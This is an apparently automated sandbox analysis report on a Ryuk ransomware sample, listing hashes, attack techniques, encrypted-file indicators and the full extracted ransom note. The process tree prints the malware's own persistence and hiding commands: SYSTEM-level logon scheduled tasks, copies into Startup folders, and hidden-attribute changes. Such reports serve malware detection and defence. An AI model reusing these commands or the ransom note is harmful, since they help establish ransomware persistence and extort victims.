ryuk | fe4547b20cf40de0e33ed545949f3e0dfef815b5add252d233177386910643a6

Analysis

max time kernel
150s
max time network
125s
platform
windows7_x64
resource
win7-20230712-en
resource tags

arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
submitted
19-07-2023 14:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ecd9d8ef99eb98exe_JC.exe
Size

889KB
MD5

ecd9d8ef99eb9813fa4eced549ea4d88
SHA1

7db7bff4ca9e94bbfe026c2282f3ce36e423f183
SHA256

fe4547b20cf40de0e33ed545949f3e0dfef815b5add252d233177386910643a6
SHA512

2882d1b8ca5654b142e368f2bcb712bf9d8e3e096aacaf5a5f6ffb62b3062df0245db05e13bdc61ab2bd676349c751b87e8880ab034e73d6cd94e29cc165648b
SSDEEP

12288:GFGYwyCMcRzRjWYgeWYg955/155/KQurE+HG8dSyjCtRronBeSrBa:GFGYtSNBQKEmG8HjCXrUVa

Score

10^/10

ryuk discovery evasion ransomware

Malware Config

Extracted

Path

C:\ProgramData\RyukReadMe.txt

Ransom Note

Your network has been penetrated. All files on each host in the network have been encrypted with a strong algorithm. Backups were either encrypted Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover. We exclusively have decryption software for your situation. More than a year ago, world experts recognized the impossibility of deciphering by any means except the original decoder. No decryption software is available in the public. Antiviruse companies, researchers, IT specialists, and no other persons cant help you decrypt the data. DO NOT RESET OR SHUTDOWN - files may be damaged. DO NOT DELETE readme files. To confirm our honest intentions.Send 2 different random files and you will get it decrypted. It can be from different computers on your network to be sure that one key decrypts everything. 2 files we unlock for free To get info (decrypt your files) contact us at [email protected] or [email protected] You will receive btc address for payment in the reply letter Ryuk No system is safe

Emails

[email protected]

Signatures

Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
ransomware ryuk
Renames multiple (5399) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Disables Task Manager via registry modification
evasion

Drops startup file 3 IoCs

Processes:

cmd.exeattrib.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	attrib.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

2828 icacls.exe

pid	process
2828	icacls.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

ecd9d8ef99eb98exe_JC.exe

description	ioc	process
File opened (read-only)	\??\B:	ecd9d8ef99eb98exe_JC.exe
File opened (read-only)	\??\O:	ecd9d8ef99eb98exe_JC.exe
File opened (read-only)	\??\U:	ecd9d8ef99eb98exe_JC.exe
File opened (read-only)	\??\V:	ecd9d8ef99eb98exe_JC.exe
File opened (read-only)	\??\W:	ecd9d8ef99eb98exe_JC.exe
File opened (read-only)	\??\Y:	ecd9d8ef99eb98exe_JC.exe
File opened (read-only)	\??\Z:	ecd9d8ef99eb98exe_JC.exe
File opened (read-only)	\??\F:	ecd9d8ef99eb98exe_JC.exe
File opened (read-only)	\??\H:	ecd9d8ef99eb98exe_JC.exe
File opened (read-only)	\??\I:	ecd9d8ef99eb98exe_JC.exe
File opened (read-only)	\??\M:	ecd9d8ef99eb98exe_JC.exe
File opened (read-only)	\??\N:	ecd9d8ef99eb98exe_JC.exe
File opened (read-only)	\??\R:	ecd9d8ef99eb98exe_JC.exe
File opened (read-only)	\??\G:	ecd9d8ef99eb98exe_JC.exe
File opened (read-only)	\??\J:	ecd9d8ef99eb98exe_JC.exe
File opened (read-only)	\??\P:	ecd9d8ef99eb98exe_JC.exe
File opened (read-only)	\??\T:	ecd9d8ef99eb98exe_JC.exe
File opened (read-only)	\??\E:	ecd9d8ef99eb98exe_JC.exe
File opened (read-only)	\??\K:	ecd9d8ef99eb98exe_JC.exe
File opened (read-only)	\??\L:	ecd9d8ef99eb98exe_JC.exe
File opened (read-only)	\??\A:	ecd9d8ef99eb98exe_JC.exe
File opened (read-only)	\??\Q:	ecd9d8ef99eb98exe_JC.exe
File opened (read-only)	\??\S:	ecd9d8ef99eb98exe_JC.exe
File opened (read-only)	\??\X:	ecd9d8ef99eb98exe_JC.exe

Drops file in Program Files directory 64 IoCs

Processes:

ecd9d8ef99eb98exe_JC.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10253_.GIF.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\St_Johns.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\vlc.mo.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18211_.WMF.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0216112.JPG.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02412K.JPG.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Swift_Current.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.servlet_8.1.14.v20131031.jar.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\vlc.mo.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107502.WMF.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STC.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Clarity.thmx.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Galapagos.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-attach_zh_CN.jar.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-sampler.jar.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Ust-Nera.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0301050.WMF.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18215_.WMF.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Chihuahua.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Bishkek.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\CAPSULES\THMBNAIL.PNG.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA7\1033\FM20.CHM.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00479_.WMF.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0285926.WMF.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files\UseSelect.mhtml.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\new-trigger-wiz.gif.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-enumerations.xml.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\EVRGREEN\EVRGREEN.INF.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0230876.WMF.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Sakhalin.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\STUDIO\STUDIO.ELM.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105332.WMF.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0185790.WMF.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\appletrailers.luac.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00052_.WMF.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightDemiBold.ttf.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.nl_zh_4.4.0.v20140623020002.jar.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-modules.xml.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files\Java\jre7\bin\server\Xusage.txt.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\vlc.mo.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\imap.jar.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0289430.JPG.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02201_.GIF.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mng.txt.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunmscapi.jar.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-8.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Noumea.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui_5.5.0.165303.jar.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UTC.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms.nl_zh_4.4.0.v20140623020002.jar.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\uninstall.log.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02578_.WMF.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.SF.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator_1.1.0.v20131217-1203.jar.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\ACEERR.DLL.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\ACEXBE.DLL.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00050_.WMF.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0337280.JPG.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02025_.WMF.[[email protected]].[8F562417].RYK	ecd9d8ef99eb98exe_JC.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

2136 schtasks.exe
2576 schtasks.exe
2516 schtasks.exe
2012 schtasks.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

2900 taskkill.exe
2908 taskkill.exe

pid	process
2136	schtasks.exe
2576	schtasks.exe
2516	schtasks.exe
2012	schtasks.exe

pid	process
2900	taskkill.exe
2908	taskkill.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

ecd9d8ef99eb98exe_JC.exe

pid	process
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe
2660	ecd9d8ef99eb98exe_JC.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

taskkill.exetaskkill.exe

description pid process

Token: SeDebugPrivilege 2900 taskkill.exe
Token: SeDebugPrivilege 2908 taskkill.exe

description	pid	process
Token: SeDebugPrivilege	2900	taskkill.exe
Token: SeDebugPrivilege	2908	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

ecd9d8ef99eb98exe_JC.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2660 wrote to memory of 2132	2660	ecd9d8ef99eb98exe_JC.exe	cmd.exe
PID 2660 wrote to memory of 2132	2660	ecd9d8ef99eb98exe_JC.exe	cmd.exe
PID 2660 wrote to memory of 2132	2660	ecd9d8ef99eb98exe_JC.exe	cmd.exe
PID 2132 wrote to memory of 2136	2132	cmd.exe	schtasks.exe
PID 2132 wrote to memory of 2136	2132	cmd.exe	schtasks.exe
PID 2132 wrote to memory of 2136	2132	cmd.exe	schtasks.exe
PID 2660 wrote to memory of 1656	2660	ecd9d8ef99eb98exe_JC.exe	cmd.exe
PID 2660 wrote to memory of 1656	2660	ecd9d8ef99eb98exe_JC.exe	cmd.exe
PID 2660 wrote to memory of 1656	2660	ecd9d8ef99eb98exe_JC.exe	cmd.exe
PID 2660 wrote to memory of 1876	2660	ecd9d8ef99eb98exe_JC.exe	cmd.exe
PID 2660 wrote to memory of 1876	2660	ecd9d8ef99eb98exe_JC.exe	cmd.exe
PID 2660 wrote to memory of 1876	2660	ecd9d8ef99eb98exe_JC.exe	cmd.exe
PID 2660 wrote to memory of 2536	2660	ecd9d8ef99eb98exe_JC.exe	cmd.exe
PID 2660 wrote to memory of 2536	2660	ecd9d8ef99eb98exe_JC.exe	cmd.exe
PID 2660 wrote to memory of 2536	2660	ecd9d8ef99eb98exe_JC.exe	cmd.exe
PID 2536 wrote to memory of 2576	2536	cmd.exe	schtasks.exe
PID 2536 wrote to memory of 2576	2536	cmd.exe	schtasks.exe
PID 2536 wrote to memory of 2576	2536	cmd.exe	schtasks.exe
PID 2660 wrote to memory of 2804	2660	ecd9d8ef99eb98exe_JC.exe	cmd.exe
PID 2660 wrote to memory of 2804	2660	ecd9d8ef99eb98exe_JC.exe	cmd.exe
PID 2660 wrote to memory of 2804	2660	ecd9d8ef99eb98exe_JC.exe	cmd.exe
PID 2804 wrote to memory of 1672	2804	cmd.exe	attrib.exe
PID 2804 wrote to memory of 1672	2804	cmd.exe	attrib.exe
PID 2804 wrote to memory of 1672	2804	cmd.exe	attrib.exe
PID 2660 wrote to memory of 2528	2660	ecd9d8ef99eb98exe_JC.exe	cmd.exe
PID 2660 wrote to memory of 2528	2660	ecd9d8ef99eb98exe_JC.exe	cmd.exe
PID 2660 wrote to memory of 2528	2660	ecd9d8ef99eb98exe_JC.exe	cmd.exe
PID 2528 wrote to memory of 2516	2528	cmd.exe	schtasks.exe
PID 2528 wrote to memory of 2516	2528	cmd.exe	schtasks.exe
PID 2528 wrote to memory of 2516	2528	cmd.exe	schtasks.exe
PID 2660 wrote to memory of 2492	2660	ecd9d8ef99eb98exe_JC.exe	cmd.exe
PID 2660 wrote to memory of 2492	2660	ecd9d8ef99eb98exe_JC.exe	cmd.exe
PID 2660 wrote to memory of 2492	2660	ecd9d8ef99eb98exe_JC.exe	cmd.exe
PID 2492 wrote to memory of 2012	2492	cmd.exe	schtasks.exe
PID 2492 wrote to memory of 2012	2492	cmd.exe	schtasks.exe
PID 2492 wrote to memory of 2012	2492	cmd.exe	schtasks.exe
PID 2660 wrote to memory of 2428	2660	ecd9d8ef99eb98exe_JC.exe	cmd.exe
PID 2660 wrote to memory of 2428	2660	ecd9d8ef99eb98exe_JC.exe	cmd.exe
PID 2660 wrote to memory of 2428	2660	ecd9d8ef99eb98exe_JC.exe	cmd.exe
PID 2428 wrote to memory of 1716	2428	cmd.exe	attrib.exe
PID 2428 wrote to memory of 1716	2428	cmd.exe	attrib.exe
PID 2428 wrote to memory of 1716	2428	cmd.exe	attrib.exe
PID 2660 wrote to memory of 2416	2660	ecd9d8ef99eb98exe_JC.exe	cmd.exe
PID 2660 wrote to memory of 2416	2660	ecd9d8ef99eb98exe_JC.exe	cmd.exe
PID 2660 wrote to memory of 2416	2660	ecd9d8ef99eb98exe_JC.exe	cmd.exe
PID 2416 wrote to memory of 1540	2416	cmd.exe	attrib.exe
PID 2416 wrote to memory of 1540	2416	cmd.exe	attrib.exe
PID 2416 wrote to memory of 1540	2416	cmd.exe	attrib.exe
PID 2660 wrote to memory of 1080	2660	ecd9d8ef99eb98exe_JC.exe	cmd.exe
PID 2660 wrote to memory of 1080	2660	ecd9d8ef99eb98exe_JC.exe	cmd.exe
PID 2660 wrote to memory of 1080	2660	ecd9d8ef99eb98exe_JC.exe	cmd.exe
PID 1080 wrote to memory of 2644	1080	cmd.exe	cmd.exe
PID 1080 wrote to memory of 2644	1080	cmd.exe	cmd.exe
PID 1080 wrote to memory of 2644	1080	cmd.exe	cmd.exe
PID 2660 wrote to memory of 1992	2660	ecd9d8ef99eb98exe_JC.exe	cmd.exe
PID 2660 wrote to memory of 1992	2660	ecd9d8ef99eb98exe_JC.exe	cmd.exe
PID 2660 wrote to memory of 1992	2660	ecd9d8ef99eb98exe_JC.exe	cmd.exe
PID 1992 wrote to memory of 2508	1992	cmd.exe	cmd.exe
PID 1992 wrote to memory of 2508	1992	cmd.exe	cmd.exe
PID 1992 wrote to memory of 2508	1992	cmd.exe	cmd.exe
PID 1992 wrote to memory of 2900	1992	cmd.exe	taskkill.exe
PID 1992 wrote to memory of 2900	1992	cmd.exe	taskkill.exe
PID 1992 wrote to memory of 2900	1992	cmd.exe	taskkill.exe
PID 2644 wrote to memory of 2828	2644	cmd.exe	icacls.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Views/modifies file attributes 1 TTPs 3 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exe

pid process

1672 attrib.exe
1716 attrib.exe
1540 attrib.exe

pid	process
1672	attrib.exe
1716	attrib.exe
1540	attrib.exe

C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe
"C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe"
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2660

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
2⤵
- Suspicious use of WriteProcessMemory
PID:2132

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
3⤵
- Creates scheduled task(s)
PID:2136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
2⤵
- Drops startup file
PID:1656

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
2⤵
PID:1876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
2⤵
- Suspicious use of WriteProcessMemory
PID:2536

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
3⤵
- Creates scheduled task(s)
PID:2576

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:2804

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
3⤵
- Drops startup file
- Views/modifies file attributes
PID:1672

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe" /RU SYSTEM /RL HIGHEST /F
2⤵
- Suspicious use of WriteProcessMemory
PID:2528

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe" /RU SYSTEM /RL HIGHEST /F
3⤵
- Creates scheduled task(s)
PID:2516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe" /F
2⤵
- Suspicious use of WriteProcessMemory
PID:2492

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe" /F
3⤵
- Creates scheduled task(s)
PID:2012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:2428

C:\Windows\system32\attrib.exe
